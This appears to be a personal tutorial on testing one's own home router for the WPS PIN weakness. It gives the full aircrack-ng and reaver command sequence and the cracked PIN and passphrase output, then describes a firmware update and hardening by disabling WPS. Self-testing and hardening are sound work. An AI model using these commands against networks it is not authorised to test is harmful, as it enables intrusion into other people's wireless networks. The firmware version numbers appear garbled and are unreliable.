In order to do this, you must have a WiFi card that can enter monitor mode. The Panda PAU05 300Mbps worked well for me, but I cannot guarantee that the card will work for you. Some cards of the same model ship with different chipsets, or have new versions released. Buy an appropriate card at your own risk!
Without a working card, you will be unable to carry out this test.
Install the necessary tools.
sudo apt-get install \ aircrack-ng \ reaver
Disable your WiFi interface.
sudo ifconfig wlan0 down
Enable monitor mode for your WiFi interface.
sudo airmon-ng start wlan0
Note the name of the monitoring device output from the command above. In my case, it is
Kill processes that may conflict with airmon tools.
sudo airmon-ng check kill
Scan for a network.
PWR indicates signal strength. A number like
-20 is superior to a number like
-74. The greater number is superior, and
-20 is greater than
sudo airodump-ng wlan0mon
Try to test for the WPS vulnerability against the AP using
reaver, which is specifically designed for this exploit. Specify your device's channel with
-c and the BSSID (mac of the router) with
sudo reaver \ -i wlan0mon \ -c 2 \ -b 22:46:BA:34:CB:18 \ -vv \ -L \ -N \ -d 30 \ -T 1 \ -r 3:15
If your access point is vulnerable, the WPS pin will eventually be discovered.
[+] Pin cracked in 273832 seconds [+] WPS PIN: '29701453' [+] WPA PSK: 'thepassword123' [+] AP SSID: 'MyAccessPoint'
My router was compromised in 273832 seconds, which is just over 3 days.
My Netgear WNR2000v3 was then updated to the latest firmware as listed here.
Current Firmware Version: V188.8.131.52 New Firmware Version: V184.108.40.206 Current GUI Language Version: V220.127.116.11 New GUI Language Version: V18.104.22.168
This upgrade automatically enables a 3 second lockout for failed WPS attempts.
reaver did not seem to care, and went to work hacking the PIN just as it did before. It was not affected by that lockout setting.
In cases like that, it seems the only reliable preventative measure is to either get a router that actually disables WPS, or install DD-WRT on your router.
Fortunately, this firmware upgrade actually worked in my case, and
reaver was unable to determine my PIN.
- Constant receive timeout (0x03), or WPS transaction fail (0x02) with rtl8187
- WPS Cracking with Reaver
- How to Crack a Wi-Fi Network's WPA Password with Reaver
- Hands-on: hacking WiFi Protected Setup with Reaver
- How do I install bully and mdk3 on Ubuntu 16.04 (Xenial Xerus)?
- aireplay invalid destination MAC address